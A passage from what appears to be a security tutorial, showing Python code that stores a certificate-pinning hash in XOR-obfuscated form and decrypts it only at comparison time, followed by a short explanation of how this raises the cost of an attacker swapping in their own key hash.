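import base64
import hashlib

KEY = b"\x5a\x13\x37\xc0"  # hypothetical build-specific key

def xor_bytes(data: bytes, key: bytes) -> bytes:
    # XOR is a placeholder for a real cipher, kept short for illustration.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Build time: embed only the encrypted form of the pinned hash.
# (The plain value here is base64(SHA-256(b"test")), chosen so the
# run-time check below can be demonstrated.)
plain_pin = "n4bQgYhMfWWaL+qgxVrQFaO/TxsrC4Is0V1sFbDwCgg="
stored_pin = xor_bytes(plain_pin.encode(), KEY)

# Run time: decrypt immediately before the comparison, so the plain
# base64 string never appears in the binary itself.
def pin_matches(candidate_spki: bytes) -> bool:
    expected = xor_bytes(stored_pin, KEY).decode()
    candidate = base64.b64encode(hashlib.sha256(candidate_spki).digest()).decode()
    return candidate == expected

print(stored_pin != plain_pin.encode())  # True: plain pin not embedded
print(pin_matches(b"test"))              # True: legitimate key matches
print(pin_matches(b"mitm key"))          # False: attacker hash differs
```

An attacker who swaps in the hash of their own key now also has to encrypt it with the right key and scheme, which is exactly the extra hurdle the mitigation aims for; combining this with the hook detection and name obfuscation described earlier raises the cost of each bypass path.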